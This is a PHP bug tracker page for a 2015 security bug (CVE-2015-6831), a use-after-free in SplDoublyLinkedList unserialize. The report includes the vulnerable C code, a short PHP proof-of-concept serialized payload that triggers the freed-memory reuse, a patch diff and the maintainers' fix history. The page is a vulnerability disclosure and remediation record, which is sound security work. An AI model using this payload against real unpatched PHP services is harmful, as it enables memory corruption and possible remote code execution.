php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #70169 Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Submitted: 2015-07-30 11:11 UTC Modified: 2015-09-09 10:05 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.4.43 OS: *
Private report: No CVE-ID: 2015-6831
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2015-07-30 11:11 UTC] taoguangchen at icloud dot com 
Description:
------------
I has reported a similar bug in BUG#70168

```
	ALLOC_INIT_ZVAL(flags);
	if (!php_var_unserialize(&flags, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(flags) != IS_LONG) {
		zval_ptr_dtor(&flags);
		goto error;
	}
	intern->flags = Z_LVAL_P(flags);
	zval_ptr_dtor(&flags);   <=== free memory
	
	...

	PHP_VAR_UNSERIALIZE_DESTROY(var_hash);
	return;
```

&flags was be freed, but we can use that already freed memory via R: and r:. it is possible to use-after-free attack and execute arbitrary code remotely.

PoC:

```
$inner = 'i:1;';
$exploit = 'a:2:{i:0;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';

$data = unserialize($exploit);

for($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi'.$i;
}

var_dump($data);
```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-07-30 11:15 UTC] taoguangchen at icloud dot com 
the patch for 5.4 series ( maybe work on 5.5 and 5.6 series ):

diff --git a/php-5.4.43/spl_dllist.c b/php-5.4.43-fixed/spl_dllist.c
index b5ddfc0..790fb60 100644
--- a/php-5.4.43/spl_dllist.c
+++ b/php-5.4.43-fixed/spl_dllist.c
@@ -1209,6 +1209,9 @@ SPL_METHOD(SplDoublyLinkedList, unserialize)
 		zval_ptr_dtor(&flags);
 		goto error;
 	}
+	
+	var_push_dtor(&var_hash, &flags);
+	
 	intern->flags = Z_LVAL_P(flags);
 	zval_ptr_dtor(&flags);
 [2015-08-02 04:53 UTC] stas@php.net 
patch is at https://gist.github.com/smalyshev/fe6473c6260f5a7fdc56
 [2015-08-04 22:22 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-04 22:22 UTC] stas@php.net
-Status: Open +Status: Closed
 [2015-08-04 22:23 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-04 22:30 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-05 07:29 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-05 10:12 UTC] ab@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-09-09 10:05 UTC] kaplan@php.net
-Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: 2015-6831
 [2015-09-09 10:05 UTC] kaplan@php.net 
Shared CVE between bugs #70155, #70166, #70168 and #70169.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 12:01:29 2024 UTC